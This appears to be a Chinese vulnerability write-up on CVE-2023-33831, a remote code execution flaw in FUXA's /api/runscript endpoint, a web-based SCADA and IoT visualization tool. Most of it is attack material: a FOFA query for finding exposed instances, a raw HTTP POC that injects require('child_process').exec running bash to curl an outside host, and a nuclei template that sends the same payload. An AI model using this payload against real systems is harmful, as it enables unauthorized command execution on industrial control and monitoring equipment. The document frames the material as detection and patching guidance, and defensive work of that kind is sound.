本文详细描述了FUXA系统中的远程代码执行漏洞,涉及脚本组件的安全问题,利用可控制输入执行恶意代码。提供POC示例和检测方法,建议用户更新到最新版本以修复这一高危漏洞。
FUXA远程命令执行漏洞
1.漏洞介绍
FUXA 非常容易从使用树莓派 up 的小型项目扩展到大型设施的可视化。它还提供了强大的完全基于 web 的新工具,允许您创建丰富的可视化,数据日志,警报,通知,趋势和远程设备实时控制,它使设备通过行业标准物联网协议 MQTT, OPC-UA, BACnet, Modbus, SiemensS7, WebAPI,以太网/IP (Allen Bradley)连接到一个易于使用的界面。低级协议(如 Serial 或 TCP)可以使您快速地与自定义或专有协议进行交互。
该漏洞会影响 FUXA 的脚本组件,因为对用户可以控制的输入缺乏控制或清理,从而允许使用可扩展为远程代码执行的危险方法。受影响的路径是 /api/runscript
2.漏洞编号
| CVE | CNVD | CNNVD |
|---|---|---|
| CVE-2023-33831 | - | - |
3.影响范围
| 名称 | 版本号 |
|---|---|
| - |
4.检索特征
FOFA:title=“FUXA”
5.POC
POST https://127.0.0.1/api/runscript HTTP/1.1
Host: 127.0.0.1
Content-Type: application/json
User-Agent: python-requests/2.24.0
Accept-Encoding: gzip, deflate
Accept: */*
Content-Length: 303
{"headers": {"normalizedNames": {}, "lazyUpdate": "null"}, "params": {"script": {"parameters": [{"name": "ok", "type": "tagid", "value": ""}], "mode": "", "id": "", "test": "true", "name": "ok", "outputId": "", "code": "require('child_process').exec('/bin/bash -c \"curl http://dnslog\"')"}}}
nuclei检测
id: FUAX-RCE
info:
name: 该漏洞会影响 FUXA 的脚本组件,因为对用户可以控制的输入缺乏控制或清理,从而允许使用可扩展为远程代码执行的危险方法。受影响的路径是 /api/runscript。
author: WLF
severity: high
metadata:
fofa-query: title="FUXA"
variables:
filename: "{{to_lower(rand_base(10))}}"
boundary: "{{to_lower(rand_base(20))}}"
http:
- raw:
- |
POST /api/runscript HTTP/1.1
Host: {{Hostname}}
Content-Type: application/json
User-Agent: python-requests/2.24.0
Accept-Encoding: gzip, deflate
Accept: */*
Content-Length: 321
{"headers": {"normalizedNames": {}, "lazyUpdate": "null"}, "params": {"script": {"parameters": [{"name": "ok", "type": "tagid", "value": ""}], "mode": "", "id": "", "test": "true", "name": "ok", "outputId": "", "code": "require('child_process').exec('/bin/bash -c \"curl http://{{interactsh-url}}\"')"}}}
matchers:
- type: dsl
dsl:
- contains(interactsh_protocol, "dns")
condition: and
6.修复建议
更新到最新版本
200
被折叠的 条评论
为什么被折叠?
到【灌水乐园】发言
